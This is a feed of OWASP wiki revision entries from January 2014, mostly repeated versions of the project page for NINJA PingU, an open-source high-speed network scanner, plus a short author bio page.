=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165838</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165838"/>
				<updated>2014-01-14T19:51:23Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==What's NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
'''NINJA-PingU Is Not Just a Ping Utility''' is a free open-source high performance network scanner tool for large scale analyses. It has been designed with performance as its primary goal and developed as a framework to allow easy plugin integration.&lt;br /&gt;
&lt;br /&gt;
==How NINJA PingU Works?==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU takes advantage of raw sockets to reduce the three-way TCP handshake latency and it's state. Directly sending IP packets also avoids the TCP stack overhead.&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Design.jpg||550px|left||link=http://owasp.github.io/NINJA-PingU/images/NINJA%20PingU%20Architecture.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
It also implements non-blocking networking I/O in the plugin's interface by means of epoll. Each component is multithreaded and they have built-in caches to minimize synchronization points. In addition, the results persistment operations are buffered to reduce disk writes.&lt;br /&gt;
&lt;br /&gt;
. &lt;br /&gt;
&lt;br /&gt;
==Why NINJA PingU?==&lt;br /&gt;
&lt;br /&gt;
It has been developed to easily allow developers build their custom plugins. Samples of those can be found in its codebase. In addition, more information about NINJA PingU can be found in the FAQ and dev pages. NINJA PingU also integrates gnuplot to automatically plot the analysis results. In addition, a custom terminator has been embedded for enhanced data visualization.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:NINJA_PingU_Performance.jpg||550px|link=http://owasp.github.io/NINJA-PingU/images/ninjapinguplot.png]]&lt;br /&gt;
&lt;br /&gt;
The previous chart corresponds to a 17 seconds analysis in a 100mbps network, where 10 million hosts were scanned and 9 thousand services identified. The analysis average speed was higher than half million hosts scanned per second.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Features ==&lt;br /&gt;
&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Detection&lt;br /&gt;
* Embedded Devices Identification&lt;br /&gt;
* High Performance Framework&lt;br /&gt;
* Easily Plugin Integration&lt;br /&gt;
&lt;br /&gt;
== Links ==&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ Home]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/faq.html FAQ]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/dev.html Dev]&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/plugins.html Plugins]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:NINJA_PingU_Performance.jpg&amp;diff=165837</id>
		<title>File:NINJA PingU Performance.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:NINJA_PingU_Performance.jpg&amp;diff=165837"/>
				<updated>2014-01-14T19:35:09Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: NINJA PingU Performance&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;NINJA PingU Performance&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:NINJA_PingU_Design.jpg&amp;diff=165836</id>
		<title>File:NINJA PingU Design.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:NINJA_PingU_Design.jpg&amp;diff=165836"/>
				<updated>2014-01-14T19:33:38Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: NINJA PingU Design&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;NINJA PingU Design&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=165803</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=165803"/>
				<updated>2014-01-14T14:28:19Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Guifré is a passionate information security engineer, pentester and secure software researcher with strong academic and technical background, whose work is aimed at making the world a safer place.&lt;br /&gt;
&lt;br /&gt;
Most of his work has been open source released in several projects and/or published in papers&amp;amp;conferences. Representative samples of those can be found querying his name in google search, on his linkedin profile, on his blog and also on his twitter timeline.&lt;br /&gt;
&lt;br /&gt;
Guifré is the project lead of OWASP NINJA PingU http://owasp.github.io/NINJA-PingU and  part of the Core Development Team of the OWASP ZAP project http://zaproxy.googlecode.com&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=165802</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=165802"/>
				<updated>2014-01-14T14:28:00Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Guifré is a passionate information security engineer, pentester and secure software researcher with strong academic and technical background, whose work is aimed at making the world a safer place.&lt;br /&gt;
&lt;br /&gt;
Most of his work has been open source released in several projects and/or published in papers&amp;amp;conferences. Representative samples of those can be found querying his name in google search, on his linkedin profile, on his blog and also on his twitter timeline.&lt;br /&gt;
&lt;br /&gt;
Guifré is the project lead of OWASP NINJA PingU http://owasp.github.io/NINJA-PingU and  part of the Core Development Team of the OWASP ZAP project http://zaproxy.googlecode.com&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on 127.0.0.1[http://caos.uab.es/~gruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165454</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165454"/>
				<updated>2014-01-06T19:09:02Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU provides a set of functionalities to detect special devices within an IP address range such as IP Cameras, printers, web servers, SSH services and several others.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU uses raw sockets, non-blocking I/O, multithreading, caching, and other technologies to achieve a very high network performance. Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* Version 1.0 released&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165453</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165453"/>
				<updated>2014-01-06T19:08:32Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU provides a set of functionalities to detect special devices within an IP address range such as IP Cameras, printers, web servers, SSH services and several others.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU uses raw sockets, non-blocking I/O, multithreading, caching, and other technologies to achieve a very high network performance. Read more about it in its home page at http://owasp.github.io/NINJA-PingU/ and its code base ad https://github.com/OWASP/NINJA-PingU&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
* Host discoverage&lt;br /&gt;
* Services discoverage&lt;br /&gt;
* Operating System detection&lt;br /&gt;
* Special devices discoverage&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Presentation ==&lt;br /&gt;
&lt;br /&gt;
Link to presentation&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Project Leader ==&lt;br /&gt;
&lt;br /&gt;
* [mailto:guifre.ruiz@owasp.org Guifre Ruiz]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
&lt;br /&gt;
* [http://owasp.github.io/NINJA-PingU/ NINJA PingU]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Nov 2013] News 2&lt;br /&gt;
* [30 Sep 2013] News 1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== In Print ==&lt;br /&gt;
This project can be purchased as a print on demand book from Lulu.com&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=FAQs=&lt;br /&gt;
&lt;br /&gt;
; Q1&lt;br /&gt;
: A1&lt;br /&gt;
&lt;br /&gt;
; Q2&lt;br /&gt;
: A2&lt;br /&gt;
&lt;br /&gt;
= Acknowledgements =&lt;br /&gt;
==Volunteers==&lt;br /&gt;
NINJA Pingu is developed by a worldwide team of volunteers. The primary contributors to date have been:&lt;br /&gt;
&lt;br /&gt;
* Guifre Ruiz&lt;br /&gt;
&lt;br /&gt;
==Others==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Road Map  =&lt;br /&gt;
&lt;br /&gt;
==Release 1.0 ==&lt;br /&gt;
NINJA Pingu 1.0 has been released, which includes:&lt;br /&gt;
* Host Discoverage.&lt;br /&gt;
* Services Discoverage&lt;br /&gt;
* Operating System Discoverage&lt;br /&gt;
* Special Network Devices (IP Cameras and Prinerts) Discoverage.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Release 1.1==&lt;br /&gt;
&lt;br /&gt;
The next release has not been scheduled yet.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Involvement in the development and promotion of NINJA PingU is actively encouraged!&lt;br /&gt;
You do not have to be a security expert in order to contribute.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
{{:Projects/OWASP_NINJA_PingU_Project}}  &lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Builders]] [[Category:OWASP_Defenders]]  [[Category:OWASP_Document]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165445</id>
		<title>OWASP NINJA PingU Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_NINJA_PingU_Project&amp;diff=165445"/>
				<updated>2014-01-06T17:42:00Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP NINJA PingU: Is Not Just A Ping Utility==&lt;br /&gt;
&lt;br /&gt;
&amp;quot;OWASP NINJA PingU: Is Not Just A Ping Utility&amp;quot; is a free open-source, high performance, network scanner and services discoverage tool for large scale analyses of millions of hosts.&lt;br /&gt;
&lt;br /&gt;
==Introduction==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU provides a set of functionalities to detect special devices within an IP address range such as IP Cameras, printers, web servers, SSH services and several others.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
NINJA PingU uses raw sockets, non-blocking I/O, multithreading, caching, and other technologies to achieve a very high network performance. Read more about it at http://owasp.github.io/NINJA-PingU/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU is free to use. It is licensed under the GNU GPL v3 License&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== What is OWASP NINJA PingU? ==&lt;br /&gt;
&lt;br /&gt;
OWASP NINJA PingU  provides:&lt;br /&gt;
&lt;br /&gt;
